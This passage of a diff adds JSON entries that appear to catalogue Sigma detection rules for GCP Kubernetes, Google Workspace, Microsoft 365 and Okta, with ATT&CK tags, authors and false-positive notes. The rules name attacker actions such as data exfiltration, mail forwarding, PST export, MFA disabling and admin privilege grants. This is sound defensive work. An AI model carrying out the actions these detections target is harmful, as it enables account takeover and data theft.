"https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ], + "creation_date": "2021/11/22", + "filename": "gcp_kubernetes_cronjob.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", + "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", + "value": "Google Cloud Kubernetes RoleBinding", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/pull/1267", + "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", + "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", + "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" + ], + "tags": [ + "attack.credential_access" + ], + "creation_date": "2021/08/09", + "filename": "gcp_kubernetes_rolebinding.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when the Secrets are Modified or Deleted.", + "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", + "value": "Google Cloud Kubernetes Secrets Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.credential_access" + ], + "creation_date": "2021/08/09", + "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when a service account is disabled or deleted in Google Cloud.", + "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", + "value": "Google Cloud Service Account Disabled or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ], + "creation_date": "2021/08/14", + "filename": "gcp_service_account_disabled_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when a service account is modified in Google Cloud.", + "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", + "value": "Google Cloud Service Account Modified", + "meta": { + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_modified.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/14", + "filename": "gcp_service_account_modified.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Detect when a Cloud SQL DB has been modified or deleted.", + "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", + "value": "Google Cloud SQL Database Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/10/15", + "filename": "gcp_sql_database_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "SQL Database being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", + "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", + "value": "Google Cloud VPN Tunnel Modified or Deleted", + "meta": { + "refs": [ + "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/16", + "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "VPN Tunnel being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Detects when an an application is removed from Google Workspace.", + "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", + "value": "Google Workspace Application Removed", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/26", + "filename": "gworkspace_application_removed.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Application being removed may be performed by a System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when an API access service account is granted domain authority.", + "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", + "value": "Google Workspace Granted Domain API Access", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2021/08/23", + "filename": "gworkspace_granted_domain_api_access.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when multi-factor authentication (MFA) is disabled.", + "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", + "value": "Google Workspace MFA Disabled", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/26", + "filename": "gworkspace_mfa_disabled.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "MFA may be disabled and performed by a system administrator." + ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when an a role is modified or deleted in Google Workspace.", + "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", + "value": "Google Workspace Role Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/24", + "filename": "gworkspace_role_modified_or_deleted.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when an a role privilege is deleted in Google Workspace.", + "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", + "value": "Google Workspace Role Privilege Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/24", + "filename": "gworkspace_role_privilege_deleted.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when an Google Workspace user is granted admin privileges.", + "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", + "value": "Google Workspace User Granted Admin Privileges", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2021/08/23", + "filename": "gworkspace_user_granted_admin_privileges.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Google Workspace admin role privileges, may be modified by system administrators." + ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", + "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", + "value": "Activity Performed by Terminated User", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_activity_by_terminated_user.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", + "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", + "value": "Activity from Anonymous IP Addresses", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "User using a VPN or Proxy" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", + "uuid": "0f2468a2-5055-4212-a368-7321198ee706", + "value": "Activity from Infrequent Country", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_activity_from_infrequent_country.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", + "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", + "value": "Data Exfiltration to Unsanctioned Apps", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", + "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", + "value": "Activity from Suspicious IP Addresses", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_from_susp_ip_addresses.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", + "uuid": "d7eab125-5f94-43df-8710-795b80fa1189", + "value": "Microsoft 365 - Impossible Travel Activity", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2020/07/06", + "filename": "microsoft365_impossible_travel_activity.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", + "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", + "value": "Logon from a Risky IP Address", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_logon_from_risky_ip_address.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Alert for the addition of a new federated domain.", + "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", + "value": "New Federated Domain Added", + "meta": { + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://www.sygnia.co/golden-saml-advisory", + "https://o365blog.com/post/aadbackdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.003" + ], + "creation_date": "2022/02/08", + "filename": "microsoft365_new_federated_domain_added.yml", + "author": "@ionsor", + "level": "medium", + "falsepositive": [ + "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", + "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", + "value": "Microsoft 365 - Potential Ransomware Activity", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ], + "creation_date": "2021/08/19", + "filename": "microsoft365_potential_ransomware_activity.yml", + "author": "austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", + "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", + "value": "PST Export Alert Using eDiscovery Alert", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ], + "creation_date": "2022/02/08", + "filename": "microsoft365_pst_export_alert.yml", + "author": "Sorina Ionescu", + "level": "medium", + "falsepositive": [ + "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", + "uuid": "6897cd82-6664-11ed-9022-0242ac120002", + "value": "PST Export Alert Using New-ComplianceSearchAction", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ], + "creation_date": "2022/11/17", + "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", + "author": "Nikita Khalimonenkov", + "level": "medium", + "falsepositive": [ + "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", + "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", + "value": "Suspicious Inbox Forwarding", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "creation_date": "2021/08/22", + "filename": "microsoft365_susp_inbox_forwarding.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", + "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", + "value": "Suspicious OAuth App File Download Activities", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" + ], + "tags": [ + "attack.exfiltration" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", + "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", + "value": "Microsoft 365 - Unusual Volume of File Deletion", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/08/19", + "filename": "microsoft365_unusual_volume_of_file_deletion.yml", + "author": "austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", + "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", + "value": "Microsoft 365 - User Restricted from Sending Email", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1199" + ], + "creation_date": "2021/08/19", + "filename": "microsoft365_user_restricted_from_sending_email.yml", + "author": "austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when an the Administrator role is assigned to an user or group.", + "uuid": "413d4a81-6c98-4479-9863-014785fd579c", + "value": "Okta Admin Role Assigned to an User or Group", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_admin_role_assigned_to_user_or_group.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Administrator roles could be assigned to users or group by other admin users." + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when a API token is created", + "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", + "value": "Okta API Token Created", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2021/09/12", + "filename": "okta_api_token_created.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when a API Token is revoked.", + "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", + "value": "Okta API Token Revoked", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_api_token_revoked.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an application is modified or deleted.", + "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", + "value": "Okta Application Modified or Deleted", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_application_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an application Sign-on Policy is modified or deleted.", + "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", + "value": "Okta Application Sign-On Policy Modified or Deleted", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an attempt at deactivating or resetting MFA.", + "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", + "value": "Okta MFA Reset or Deactivated", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2021/09/21", + "filename": "okta_mfa_reset_or_deactivated.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "If a MFA reset or deactivated was performed by a system administrator." + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an Network Zone is Deactivated or Deleted.", + "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", + "value": "Okta Network Zone Deactivated or Deleted", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_network_zone_deactivated_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an Okta policy is modified or deleted.", + "uuid": "1667a172-ed4c-463c-9969-efd92195319a", + "value": "Okta Policy Modified or Deleted", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_policy_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Okta Policies being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an Policy Rule is Modified or Deleted.", + "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", + "value": "Okta Policy Rule Modified or Deleted", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_policy_rule_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": 